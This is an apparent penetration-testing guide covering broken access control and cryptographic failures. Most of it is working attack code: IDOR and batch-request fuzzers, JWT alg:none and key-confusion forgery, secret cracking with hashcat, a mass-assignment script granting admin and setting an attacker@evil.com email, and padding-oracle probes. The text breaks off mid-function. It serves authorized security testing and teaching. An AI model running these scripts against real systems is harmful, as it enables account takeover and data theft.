OWASP Top 10 Vulnerabilities: The Ultimate Toolkit Guide

Comprehensive Encyclopedia of Offensive Security Tools, Techniques, and Procedures

Introduction: The Modern AppSec Arsenal

The OWASP Top 10 represents the most critical web application security risks, but defending against them requires understanding the attacker's toolkit. This comprehensive guide details professional-grade tools, advanced techniques, and operational procedures for testing each vulnerability category. We'll cover everything from basic reconnaissance to sophisticated exploitation chains, emphasizing authorized testing methodologies and real-world workflows.

Legal & Ethical Disclaimer: All tools and techniques described herein must be used only on systems you own or have explicit written authorization to test. Unauthorized testing is illegal and unethical. Always establish clear rules of engagement and scope before any security assessment.


Chapter 1: Broken Access Control - The Gatekeeper's Failure

1.1 Deep Dive: Understanding Access Control Models

Access control failures occur when applications fail to properly enforce authorization policies, allowing users to perform actions outside their intended permissions. Modern applications implement several models:

- Discretionary Access Control (DAC): resource owners control access (e.g., UNIX file permissions)
- Mandatory Access Control (MAC): system-enforced policies (SELinux, AppArmor)
- Role-Based Access Control (RBAC): permissions assigned to roles, roles assigned to users
- Attribute-Based Access Control (ABAC): policies evaluated over user and resource attributes
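In practice, most findings in this category come down to a missing per-request check rather than a flawed model: the handler authenticates the caller but never verifies ownership of the requested object. A minimal, framework-free Python sketch of the broken-versus-fixed pattern (all names invented for illustration):

from dataclasses import dataclass

@dataclass
class Document:
    id: int
    owner_id: int
    body: str

DOCS = {1: Document(id=1, owner_id=42, body="alice's notes")}

def get_document(doc_id: int, current_user_id: int) -> Document:
    doc = DOCS.get(doc_id)
    if doc is None:
        raise LookupError("not found")      # 404
    # The vulnerable version stops here: authenticated != authorized (IDOR).
    # The fix is an explicit per-request ownership (or RBAC/ABAC) check:
    if doc.owner_id != current_user_id:
        raise PermissionError("forbidden")  # 403
    return doc

print(get_document(1, current_user_id=42).body)  # owner: allowed
# get_document(1, current_user_id=7) raises PermissionError for anyone else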

1.2 Professional Tooling Ecosystem

Burp Suite Enterprise-Grade Configuration

# Advanced Burp configuration for access control testing
java -jar burpsuite_pro.jar --project-file=project.burp --config-file=burp.cfg

# Burp configuration file (burp.cfg) - illustrative sketch; Burp's actual
# project/user options files are JSON, so map these settings accordingly:
burp {
  suite {
    # Increase memory for large applications
    vmargs = "-Xmx8G -XX:+UseG1GC -XX:MaxGCPauseMillis=200"
  }
  proxy {
    # Configure upstream proxy for corporate environments
    upstream_proxy = "proxy.corp.com:8080"
    # SSL interception
    ssl {
      certificate_export = "/certs/"
      client_certificates = "/certs/client.p12"
    }
  }
  scanner {
    # Custom scan configurations
    audit_depth = 10
    audit_items = ["access_control", "idor"]
  }
}

# Export project data for team collaboration (flags shown are illustrative -
# current Burp builds export projects via the UI or REST API, not CLI switches)
java -jar burpsuite_pro.jar --export-project --format=json --output=project_export.json

OWASP ZAP Advanced Automation

# ZAP Docker deployment for CI/CD integration
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py \
  -t https://target.com \
  -g gen.conf \
  -r report.html \
  -J report.json \
  -w report.md

# ZAP automation script (zap_script.js)
var HttpSender = Java.type('org.parosproxy.paros.network.HttpSender')
var ScriptVars = Java.type('org.zaproxy.zap.extension.script.ScriptVars')

function sendingRequest(msg, initiator, helper) {
  // Add custom headers for all requests
  msg.getRequestHeader().setHeader("X-Test-ID", "ACCESS-CTRL-2024")
  
  // Modify session tokens for testing
  if (msg.getRequestHeader().getURI().toString().contains("/api/")) {
    var cookies = msg.getRequestHeader().getHeader("Cookie")
    if (cookies && cookies.includes("session=")) {
      // Test with other users' session tokens
      var newCookies = cookies.replace(/session=[^;]+/, "session=ATTACKER_SESSION_TOKEN")
      msg.getRequestHeader().setHeader("Cookie", newCookies)
    }
  }
}

# ZAP API automation with Python
import zapv2
import time

zap = zapv2.ZAPv2(apikey='your-api-key', proxies={'http': 'http://127.0.0.1:8080'})

# Spider with advanced configuration
zap.spider.set_option_max_depth(5)
zap.spider.set_option_thread_count(5)
scan_id = zap.spider.scan('https://target.com')
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)  # poll until the spider completes

# Active scan with specific scanners enabled (the Python API takes
# comma-separated scanner IDs, not a dict; IDs here are illustrative -
# enumerate the real ones with zap.ascan.scanners())
zap.ascan.enable_scanners('40018,40019')
zap.ascan.set_scanner_attack_strength('40018', 'HIGH')
zap.ascan.set_scanner_alert_threshold('40018', 'MEDIUM')

1.3 Advanced IDOR (Insecure Direct Object Reference) Techniques

Parameter Analysis with Custom Tooling

#!/usr/bin/env python3
"""
Advanced IDOR detector with pattern recognition
Detects sequential/numeric UUIDs, predictable patterns
"""
import re
import requests
from urllib.parse import urlparse, parse_qs
from collections import Counter
import json
import hashlib

class IDORDetector:
    def __init__(self, target_url, session_cookies=None):
        self.target = target_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        self.param_patterns = {
            'numeric': r'\b\d{1,10}\b',
            'uuid': r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
            'base64': r'[A-Za-z0-9+/=]{20,}',
            'hex': r'[0-9a-fA-F]{16,}',
            'date': r'\d{4}-\d{2}-\d{2}'
        }
    
    def analyze_parameters(self, url):
        """Extract parameters, classifying each value and keeping the original"""
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        
        param_info = {}
        for param, values in params.items():
            for value in values:
                param_info[param] = (self.classify_value(value), value)
        
        return param_info
    
    def classify_value(self, value):
        """Classify parameter values"""
        for ptype, pattern in self.param_patterns.items():
            if re.match(pattern, value, re.IGNORECASE):
                return ptype
        return 'unknown'
    
    def generate_test_values(self, param_type, original_value):
        """Generate test values based on parameter type"""
        tests = []
        
        if param_type == 'numeric':
            base = int(original_value)
            tests = [
                str(base - 1), str(base + 1),
                str(base * 2), str(base // 2),
                '0', '-1', '999999999'
            ]
        elif param_type == 'uuid':
            # Generate similar UUIDs
            import uuid
            tests = [str(uuid.uuid4()) for _ in range(5)]
        
        return tests
    
    def modify_param(self, url, param, new_value):
        """Rebuild the URL with one query parameter replaced"""
        from urllib.parse import urlencode, urlunparse
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        params[param] = [new_value]
        return urlunparse(parsed._replace(query=urlencode(params, doseq=True)))
    
    def is_sensitive_response(self, response, keywords):
        """Heuristic: a 200 response containing any sensitive keyword"""
        if response.status_code != 200:
            return False
        if not keywords:
            return True
        body = response.text.lower()
        return any(k.lower() in body for k in keywords)
    
    def extract_indicators(self, text):
        """Report which value patterns appear in the response body"""
        return [ptype for ptype, pattern in self.param_patterns.items()
                if re.search(pattern, text)]
    
    def test_idor(self, url, sensitive_keywords=None):
        """Test for IDOR vulnerabilities"""
        results = []
        param_info = self.analyze_parameters(url)
        
        for param, (ptype, original_value) in param_info.items():
            test_values = self.generate_test_values(ptype, original_value)
            
            for test_val in test_values:
                # Modify URL with test value
                test_url = self.modify_param(url, param, test_val)
                
                try:
                    response = self.session.get(test_url, timeout=10)
                    
                    # Analyze response for sensitive data
                    if self.is_sensitive_response(response, sensitive_keywords):
                        results.append({
                            'parameter': param,
                            'original_value': original_value,
                            'test_value': test_val,
                            'status_code': response.status_code,
                            'response_length': len(response.text),
                            'indicators': self.extract_indicators(response.text)
                        })
                
                except Exception:
                    continue
        
        return results

# Usage (the detector analyzes query-string parameters)
detector = IDORDetector('https://api.target.com/user/profile?user_id=123')
results = detector.test_idor(detector.target, ['SSN', 'credit_card', 'password'])

JWT Advanced Manipulation Toolkit

# JWT Toolkit (jwt_tool) advanced usage
# Install: git clone https://github.com/ticarpi/jwt_tool

# Run the full test playbook against a live endpoint
# (-M at = all tests; -rh = request header template, where the literal
#  string "jwt_tool" marks the token position; -cv = canary string expected
#  in a response to a *valid* token)
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -M at \
  -t http://target.com/api/user \
  -rh "Authorization: Bearer jwt_tool" \
  -cv "success"

# alg:none signature-stripping attack
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -X a

# Key-confusion attack (RS256 -> HS256) using the server's public key
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -X k -pk public.pem

# Dictionary attack on the HMAC secret
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -C -d /usr/share/wordlists/rockyou.txt

# Inject a claim (e.g., escalate user_id), or tamper interactively with -T
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -I -pc user_id -pv admin
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... -T

# JWT crack with hashcat
# Mode 16500 takes the complete header.payload.signature token as the hash
echo -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" > jwt.hash

# For HS256
hashcat -m 16500 jwt.hash wordlist.txt -O -w 4

# JWT automatic scanner integration (jwt_automate.py is a hypothetical
# wrapper script, shown as a CI integration sketch)
python3 jwt_automate.py \
  --target http://target.com \
  --wordlist jwt_secrets.txt \
  --threads 10 \
  --output results.json \
  --verify-endpoint /api/verify \
  --valid-keyword "success"
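To make the key-confusion attack concrete, here is a stdlib-only sketch of forging an HS256 token using the server's RSA public key bytes as the HMAC secret. It only works against verifiers that trust the token's alg header; the file name and claims are illustrative:

import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256(public_key_pem: bytes, claims: dict) -> str:
    """Sign with HS256, using the PEM bytes the server publishes for RS256
    verification as the HMAC secret (the classic RS256 -> HS256 confusion)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"

# forged = forge_hs256(open("public.pem", "rb").read(), {"user": "admin"})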

1.4 GraphQL Authorization Testing

#!/usr/bin/env python3
"""
GraphQL authorization bypass tester
Tests for inadequate field-level permissions
"""
import requests
import json

class GraphQLAuthTester:
    def __init__(self, endpoint, headers=None):
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.introspection_query = """
        query IntrospectionQuery {
          __schema {
            queryType { name }
            mutationType { name }
            subscriptionType { name }
            types {
              ...FullType
            }
            directives {
              name
              description
              locations
              args {
                ...InputValue
              }
            }
          }
        }
        fragment FullType on __Type {
          kind
          name
          description
          fields(includeDeprecated: true) {
            name
            description
            args {
              ...InputValue
            }
            type {
              ...TypeRef
            }
            isDeprecated
            deprecationReason
          }
          inputFields {
            ...InputValue
          }
          interfaces {
            ...TypeRef
          }
          enumValues(includeDeprecated: true) {
            name
            description
            isDeprecated
            deprecationReason
          }
          possibleTypes {
            ...TypeRef
          }
        }
        fragment InputValue on __InputValue {
          name
          description
          type { ...TypeRef }
          defaultValue
        }
        fragment TypeRef on __Type {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
                ofType {
                  kind
                  name
                }
              }
            }
          }
        }
        """
    
    def get_introspection(self):
        """Fetch GraphQL schema via introspection"""
        response = requests.post(
            self.endpoint,
            json={'query': self.introspection_query},
            headers=self.headers
        )
        return response.json()
    
    def extract_sensitive_fields(self, schema):
        """Identify potentially sensitive fields"""
        sensitive_keywords = [
            'password', 'email', 'ssn', 'credit', 'card',
            'admin', 'role', 'permission', 'token', 'secret',
            'salary', 'address', 'phone', 'birth'
        ]
        
        sensitive_fields = []
        for type_def in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_def.get('fields'):
                for field in type_def['fields']:
                    field_name = field.get('name', '').lower()
                    if any(keyword in field_name for keyword in sensitive_keywords):
                        sensitive_fields.append({
                            'type': type_def['name'],
                            'field': field['name'],
                            'description': field.get('description', '')
                        })
        
        return sensitive_fields
    
    def test_field_level_access(self, query_template, user_tokens):
        """Test if different users can access same fields"""
        results = []
        
        for token_name, token_value in user_tokens.items():
            headers = self.headers.copy()
            headers['Authorization'] = f'Bearer {token_value}'
            
            response = requests.post(
                self.endpoint,
                json={'query': query_template},
                headers=headers
            )
            
            if response.status_code == 200:
                data = response.json()
                # Check if sensitive data is present
                if self.contains_sensitive_data(data):
                    results.append({
                        'user': token_name,
                        'has_access': True,
                        'data_exposed': self.extract_sensitive_values(data)
                    })
        
        return results
    
    def contains_sensitive_data(self, data):
        """Heuristic: a sensitive-looking key appears anywhere in the response"""
        flat = json.dumps(data).lower()
        return any(k in flat for k in ['password', 'ssn', 'secret', 'token', 'salary'])
    
    def extract_sensitive_values(self, data):
        """Collect key/value pairs whose key looks sensitive"""
        hits = {}
        def walk(node):
            if isinstance(node, dict):
                for k, v in node.items():
                    if any(s in k.lower() for s in
                           ['password', 'ssn', 'secret', 'token', 'salary']):
                        hits[k] = v
                    walk(v)
            elif isinstance(node, list):
                for item in node:
                    walk(item)
        walk(data)
        return hits

# Usage
tester = GraphQLAuthTester('https://target.com/graphql')
schema = tester.get_introspection()
sensitive_fields = tester.extract_sensitive_fields(schema)

1.5 Advanced Testing Techniques

Horizontal Privilege Escalation

#!/bin/bash
# Automated horizontal privilege escalation testing

# Test user A accessing user B's resources
USER_A_TOKEN="eyJ0eXAi..."
USER_B_ID="456"

# Test endpoints with User A's token accessing User B's data
ENDPOINTS=(
  "/api/users/${USER_B_ID}/profile"
  "/api/orders?user_id=${USER_B_ID}"
  "/api/documents/${USER_B_ID}/files"
  "/api/messages/${USER_B_ID}"
)

for endpoint in "${ENDPOINTS[@]}"; do
  echo "Testing: $endpoint"
  curl -s -H "Authorization: Bearer $USER_A_TOKEN" \
    "https://target.com$endpoint" \
    | jq -e 'select(.error == null)' > /dev/null \
    && echo "VULNERABLE: User A can access $endpoint"
  sleep 1
done

# Mass assignment testing with different user contexts
cat > mass_assignment_test.py << 'EOF'
import requests
import json

def test_mass_assignment(target_url, token_a, token_b):
    """Test if user can modify other users' attributes"""
    
    # Fetch user B's data with the privileged token (token_a)
    headers_a = {'Authorization': f'Bearer {token_a}'}
    user_b_data = requests.get(f'{target_url}/api/users/456', headers=headers_a).json()
    
    # Attempt the modification with the low-privilege token (token_b)
    headers_b = {'Authorization': f'Bearer {token_b}'}
    
    # Attempt to change sensitive fields
    payload = {
        'email': 'attacker@evil.com',
        'role': 'admin',
        'is_active': True,
        'permissions': ['read', 'write', 'delete']
    }
    
    # Merge with existing data
    attack_payload = {**user_b_data, **payload}
    
    response = requests.put(
        f'{target_url}/api/users/456',
        json=attack_payload,
        headers=headers_b
    )
    
    return response.status_code == 200
EOF

Batch Request Testing

# Batch request IDOR testing
import requests
import json

def test_batch_idor(target_url, session_token):
    """Test for IDOR in batch endpoints"""
    
    headers = {
        'Authorization': f'Bearer {session_token}',
        'Content-Type': 'application/json'
    }
    
    # Craft batch request with mixed user IDs
    batch_payload = {
        "requests": [
            {"method": "GET", "path": "/api/users/123/profile"},
            {"method": "GET", "path": "/api/users/456/profile"},  # Other user
            {"method": "GET", "path": "/api/users/789/profile"},
            {"method": "POST", "path": "/api/users/456/update", "body": {"role": "admin"}}
        ]
    }
    
    response = requests.post(
        f"{target_url}/api/batch",
        json=batch_payload,
        headers=headers
    )
    
    if response.status_code == 200:
        responses = response.json().get('responses', [])
        for i, resp in enumerate(responses):
            if resp.get('status') == 200:
                print(f"Batch request {i} succeeded - potential IDOR")
                print(f"Response: {resp.get('body', '')[:200]}")

# Test GraphQL batching for IDOR
graphql_batch = """
[
  {"query": "query { user(id: 123) { email privateData } }"},
  {"query": "query { user(id: 456) { email privateData } }"},
  {"query": "mutation { updateUser(id: 456, input: {role: \"admin\"}) { id } }"}
]
"""

Chapter 2: Cryptographic Failures - Beyond SSL/TLS

2.1 Advanced TLS/SSL Analysis

Comprehensive SSL Audit Framework

#!/bin/bash
# Advanced TLS scanner with detailed reporting

TARGET="example.com"
OUTPUT_DIR="./tls_audit_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

echo "[*] Starting comprehensive TLS audit for $TARGET"

# 1. SSL Labs-style comprehensive test
echo "[*] Running testssl.sh full audit"
./testssl.sh --openssl-timeout 5 --warnings batch --color 0 \
  --htmlfile $OUTPUT_DIR/testssl_full.html \
  --jsonfile $OUTPUT_DIR/testssl_full.json \
  $TARGET

# 2. Cipher suite enumeration with grading
echo "[*] Enumerating cipher suites with SSLScan"
sslscan --no-failed --no-renegotiation --no-compression \
  --no-heartbleed --no-fallback \
  --xml=$OUTPUT_DIR/sslscan.xml $TARGET

# 3. TLS version support with compatibility matrix
echo "[*] Testing TLS version support"
for version in ssl2 ssl3 tls1 tls1_1 tls1_2 tls1_3; do
  echo "Testing $version..."
  openssl s_client -connect $TARGET:443 \
    -$version < /dev/null 2>&1 | grep -E "Protocol|Cipher|Secure Renegotiation" \
    > $OUTPUT_DIR/tls_$version.txt
done

# 4. Certificate transparency log checking
echo "[*] Checking certificate transparency logs"
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq . > $OUTPUT_DIR/cert_transparency.json

# 5. OCSP stapling check
echo "[*] Testing OCSP stapling"
openssl s_client -connect $TARGET:443 -status < /dev/null 2>&1 \
  | grep -A 17 "OCSP response" > $OUTPUT_DIR/ocsp_response.txt

# 6. Certificate chain validation
echo "[*] Validating certificate chain"
openssl s_client -showcerts -connect $TARGET:443 < /dev/null 2>&1 \
  | awk '/BEGIN CERT/,/END CERT/ {print $0}' \
  > $OUTPUT_DIR/certificate_chain.pem

# Analyze the leaf certificate (openssl x509 reads the first cert in the file)
openssl x509 -in $OUTPUT_DIR/certificate_chain.pem -text -noout \
  | grep -E "Subject:|Issuer:|Not Before:|Not After :|Signature Algorithm:|Public Key Algorithm:" \
  > $OUTPUT_DIR/certificate_details.txt

# 7. Check for weak signature algorithms
echo "[*] Checking for weak signature algorithms"
openssl s_client -connect $TARGET:443 < /dev/null 2>&1 \
  | openssl x509 -text -noout | grep "Signature Algorithm" \
  | grep -E "sha1|md5" && echo "WEAK SIGNATURE ALGORITHM DETECTED"

# 8. Check for mixed content issues
echo "[*] Checking for mixed content"
curl -s https://$TARGET | grep -i "http://" | grep -v "http://$TARGET" \
  > $OUTPUT_DIR/mixed_content.txt

# 9. HSTS preload status
echo "[*] Checking HSTS configuration"
curl -sI https://$TARGET | grep -i strict-transport-security \
  > $OUTPUT_DIR/hsts_headers.txt

# 10. Generate comprehensive report
cat > $OUTPUT_DIR/report.md << EOF
# TLS/SSL Security Audit Report
## Target: $TARGET
## Date: $(date)

## Executive Summary
$(./testssl.sh --color 0 $TARGET | grep -A 5 "Overall rating")

## Detailed Findings
### Certificate Information
$(cat $OUTPUT_DIR/certificate_details.txt)

### Vulnerabilities Found
$(grep -i "vulnerable\|weak\|not offered" $OUTPUT_DIR/testssl_full.html | head -20)

### Recommendations
1. Disable weak cipher suites
2. Enable TLS 1.3
3. Implement proper HSTS headers
4. Ensure certificate transparency logging
EOF

echo "[+] Audit complete. Reports saved to $OUTPUT_DIR"

TLS Fingerprinting and Implementation Detection

#!/usr/bin/env python3
"""
Advanced TLS fingerprinting tool
Identifies specific implementations (OpenSSL, NSS, Schannel, etc.)
"""
import socket
import ssl
import json
from dataclasses import dataclass
from typing import Dict, List
import hashlib

@dataclass
class TLSFingerprint:
    target: str
    port: int = 443
    timeout: int = 5
    
    def get_tls_fingerprint(self):
        """Collect TLS handshake characteristics"""
        fingerprint = {}
        
        # Test different TLS versions
        tls_versions = [
            (ssl.PROTOCOL_TLSv1, "TLSv1"),
            (ssl.PROTOCOL_TLSv1_1, "TLSv1.1"),
            (ssl.PROTOCOL_TLSv1_2, "TLSv1.2"),
            (ssl.PROTOCOL_TLS, "TLS")  # Highest supported
        ]
        
        for proto, name in tls_versions:
            try:
                context = ssl.SSLContext(proto)
                context.set_ciphers('ALL:COMPLEMENTOFALL')
                
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        cipher = ssock.cipher()
                        cert = ssock.getpeercert(binary_form=True)
                        
                        fingerprint[name] = {
                            'cipher_suite': cipher[0],
                            'protocol_version': cipher[1],
                            'key_length': cipher[2],
                            'certificate_sha256': hashlib.sha256(cert).hexdigest() if cert else None,
                            'session_id': ssock.session.id if ssock.session else None,
                            'session_reused': ssock.session_reused,
                            'compression': ssock.compression()
                        }
            except Exception as e:
                fingerprint[name] = {'error': str(e)}
        
        # Get all supported ciphers
        fingerprint['supported_ciphers'] = self.get_supported_ciphers()
        
        return fingerprint
    
    def get_supported_ciphers(self):
        """Test all possible cipher suites"""
        ciphers = []
        cipher_list = [
            'ECDHE-RSA-AES256-GCM-SHA384',
            'ECDHE-ECDSA-AES256-GCM-SHA384',
            'ECDHE-RSA-AES256-SHA384',
            'ECDHE-ECDSA-AES256-SHA384',
            'ECDHE-RSA-AES256-SHA',
            'ECDHE-ECDSA-AES256-SHA',
            'SRP-DSS-AES-256-CBC-SHA',
            'SRP-RSA-AES-256-CBC-SHA',
            # ... extensive cipher list
        ]
        
        for cipher in cipher_list:
            try:
                context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
                context.set_ciphers(cipher)
                
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        if ssock.cipher()[0] == cipher:
                            ciphers.append(cipher)
            except (ssl.SSLError, OSError):
                continue
        
        return ciphers
    
    def identify_implementation(self, fingerprint):
        """Identify TLS implementation based on fingerprint"""
        implementations = {
            'OpenSSL': {
                'characteristics': ['supports_tls_fallback_scsv', 'session_ticket_ext'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'DHE-RSA-AES256-GCM-SHA384']
            },
            'NSS (Mozilla)': {
                'characteristics': ['supports_signed_cert_timestamps', 'ec_point_formats'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'ECDHE-ECDSA-AES256-GCM-SHA384']
            },
            'Schannel (Windows)': {
                'characteristics': ['tls_ext_ms', 'tls_ext_reneg'],
                'ciphers': ['TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384']
            },
            'BoringSSL (Google)': {
                'characteristics': ['google_pinning', 'tls_ext_signed_cert'],
                'ciphers': ['TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384']
            }
        }
        
        matches = []
        for impl, chars in implementations.items():
            score = 0
            # Check cipher suite matches
            for cipher in chars['ciphers']:
                if cipher in fingerprint.get('supported_ciphers', []):
                    score += 1
            
            # Check characteristic matches
            for char in chars['characteristics']:
                if char in str(fingerprint):
                    score += 2
            
            if score > 0:
                matches.append((impl, score))
        
        return sorted(matches, key=lambda x: x[1], reverse=True)

# Usage
fingerprinter = TLSFingerprint("example.com")
fingerprint = fingerprinter.get_tls_fingerprint()
implementations = fingerprinter.identify_implementation(fingerprint)

2.2 Cryptographic Implementation Flaws

Padding Oracle Attack Detection

#!/usr/bin/env python3
"""
Padding Oracle Attack Detector
Tests for vulnerable CBC mode implementations
"""
import requests
import time
from base64 import b64encode, b64decode
from os import urandom

class PaddingOracleDetector:
    def __init__(self, target_url, ciphertext_param='cipher'):
        self.target_url = target_url
        self.cipher_param = ciphertext_param
        self.block_size = 16  # AES block size
        self.session = requests.Session()
    
    def send_ciphertext(self, ciphertext):
        """Submit a ciphertext value in the configured parameter"""
        return self.session.get(
            self.target_url,
            params={self.cipher_param: ciphertext},
            timeout=10
        )
    
    def modify_last_byte(self, ciphertext):
        """Flip the low bit of the final byte of a base64-encoded ciphertext"""
        raw = bytearray(b64decode(ciphertext))
        raw[-1] ^= 0x01
        return b64encode(bytes(raw)).decode()
    
    def generate_random_ciphertext(self):
        """Two blocks of random bytes, base64-encoded"""
        return b64encode(urandom(self.block_size * 2)).decode()

    def test_oracle(self, ciphertext):
        """Test if server behaves as a padding oracle"""
        test_cases = [
            # Valid ciphertext (should return 200)
            ciphertext,
            
            # Modified last byte (might cause padding error)
            self.modify_last_byte(ciphertext),
            
            # Completely random ciphertext
            self.generate_random_ciphertext(),
            
            # Short ciphertext
            ciphertext[:self.block_size * 2],
        ]
        
        responses = []
        for test_ct in test_cases:
            start_time = time.time()
            response = self.send_ciphertext(test_ct)
            elapsed = time.time() - start_time
            
            responses.append({
                'ciphertext': test_ct[:32] + '...',
                'status_code': response.status_code,
                'response_time': elapsed,
                'error_keywords': self.check_error_keywords(response.text),
                'content_length': len(response.content)
            })
        
        return responses
    
    def check_error_keywords(self, response_text):
        """Check for padding-related error messages"""
        padding_keywords = [
            'padding', 'decrypt', 'cipher', 'invalid',
            'PKCS', 'bad', 'error', 'exception',
            'malformed', 'encoding', 'cryptographic'
        ]
        
        found = []
        for keyword in padding_keywords:
            if keyword.lower() in response_text.lower():
                found.append(keyword)
        
        return found
    
    def automated_exploit_test(self):
        """Automated test for padding oracle vulnerability"""
        # Example: If application uses encrypted session cookies
        session_cookie = "ENCRYPTED_SESSION_VALUE"
        
        # Test timing attacks
        timing_differences = []
        for i in range(100):
            # Send valid request
            start = time.perf_counter()
            self.send_ciphertext(session_cookie)
            valid_time = time.perf_counter() - start
            
            # Send invalid padding
            invalid_ct = self.modify_last_byte(session_cookie)
            start = time.perf_counter()
            self.send_ciphertext(invalid_ct)
            invalid_time = time.perf_counter() - start
            
            timing_differences.append(invalid_time - valid_time)
        
        avg_timing_diff = sum(timing_differences) / len(timing_differences)
        
        # Check for significant timing difference
        if avg_timing_diff > 0.01:  # 10ms difference
            return {
                'vulnerable': True,
                'type': 'timing_based_padding_oracle',
                'average_timing_difference': avg_timing_diff
            }
        
        # Check for different error responses
        error_codes = set()
        for _ in range(20):
            random_ct = self.generate_random_ciphertext()
            response = self.send_ciphertext(random_ct)
            error_codes.add(response.status_code)
        
        if len(error_codes) > 1:
            return {
                'vulnerable': True,
                'type': 'error_based_padding_oracle',
                'different_error_codes': list(error_codes)
            }
        
        return {'vulnerable': False}

# Real-world example: ASP.NET Padding Oracle (MS10-070)
def test_aspnet_padding_oracle():
    """Test for classic ASP.NET padding oracle"""
    detector = PaddingOracleDetector("https://target.com/WebResource.axd")
    
    # ASP.NET specific tests
    test_vectors = [
        # Valid WebResource request
        "/WebResource.axd?d=VALID_ENCRYPTED_STRING",
        
        # Tampered request
        "/WebResource.axd?d=TAMPERED_ENCRYPTED_STRING",
        
        # Different error conditions
        "/WebResource.axd?d=" + "A" * 100,
        "/WebResource.axd",
    ]
    
    for vector in test_vectors:
        response = requests.get(f"https://target.com{vector}")
        
        # Check for padding-related errors
        if any(err in response.text for err in ['Padding', 'Cryptographic', 'Bad Data']):
            print(f"Potential padding oracle at {vector}")

Weak Randomness Detection

#!/usr/bin/env python3
"""
Cryptographic randomness analyzer
Tests for weak PRNG usage in session tokens, CSRF tokens, etc.
"""
import re
import requests
import collections
import math
from typing import List

class RandomnessAnalyzer:
    def __init__(self):
        self.entropy_threshold = 3.0  # Minimum entropy per byte
    
    def collect_samples(self, target_url, sample_count=1000):
        """Collect cryptographic tokens from target"""
        samples = []
        
        for _ in range(sample_count):
            try:
                # Get a page that generates tokens
                response = requests.get(target_url)
                
                # Extract potential tokens (adjust regex as needed)
                tokens = re.findall(r'[A-Za-z0-9+/=]{20,}', response.text)
                samples.extend(tokens[:5])  # Take first few tokens
                
            except Exception as e:
                print(f"Error collecting sample: {e}")
        
        return samples[:sample_count]
    
    def analyze_entropy(self, tokens: List[str]):
        """Calculate Shannon entropy of tokens"""
        results = []
        
        for token in tokens:
            # Calculate byte entropy
            if len(token) < 16:
                continue
            
            # Count byte frequencies
            byte_counts = collections.Counter(token.encode())
            total_bytes = len(token)
            
            # Calculate Shannon entropy
            entropy = 0.0
            for count in byte_counts.values():
                probability = count / total_bytes
                entropy -= probability * math.log2(probability)
            
            # Shannon entropy over the byte distribution is already bits per byte
            entropy_per_byte = entropy
            
            results.append({
                'token': token[:20] + '...',
                'length': len(token),
                'entropy_per_byte': entropy_per_byte,
                'is_weak': entropy_per_byte < self.entropy_threshold
            })
        
        return results
    
    def test_for_bias(self, tokens: List[str]):
        """Test for statistical bias in tokens"""
        if not tokens:
            return None
        
        # Convert tokens to bytes and analyze patterns
        all_bytes = b''.join([t.encode() for t in tokens])
        
        # Chi-square test for uniform distribution
        byte_counts = [0] * 256
        for byte in all_bytes:
            byte_counts[byte] += 1
        
        total_bytes = len(all_bytes)
        expected = total_bytes / 256
        
        chi_square = sum((observed - expected) ** 2 / expected 
                        for observed in byte_counts)
        
        # Degrees of freedom = 255
        # Critical value for p=0.05 is ~293
        is_biased = chi_square > 293
        
        # Test for sequential patterns
        sequential_patterns = 0
        for i in range(len(all_bytes) - 1):
            if abs(all_bytes[i] - all_bytes[i + 1]) == 1:
                sequential_patterns += 1
        
        sequential_ratio = sequential_patterns / len(all_bytes)
        
        return {
            'chi_square': chi_square,
            'is_biased': is_biased,
            'sequential_patterns': sequential_patterns,
            'sequential_ratio': sequential_ratio,
            'total_bytes_analyzed': total_bytes
        }
    
    def detect_prng_type(self, tokens: List[str]):
        """Attempt to identify the PRNG algorithm used"""
        patterns = {
            'LCG': self.check_lcg_pattern,
            'MT19937': self.check_mersenne_twister,
            'Java_Random': self.check_java_random,
            'time_based': self.check_time_based
        }
        
        detected = []
        for name, checker in patterns.items():
            if checker(tokens):
                detected.append(name)
        
        return detected
    
    def check_lcg_pattern(self, tokens):
        """Stub: real LCG detection means recovering the multiplier/increment
        from consecutive outputs; not implemented in this sketch"""
        return False
    
    def check_mersenne_twister(self, tokens):
        """Stub: MT19937 state recovery needs 624 consecutive 32-bit outputs"""
        return False
    
    def check_java_random(self, tokens):
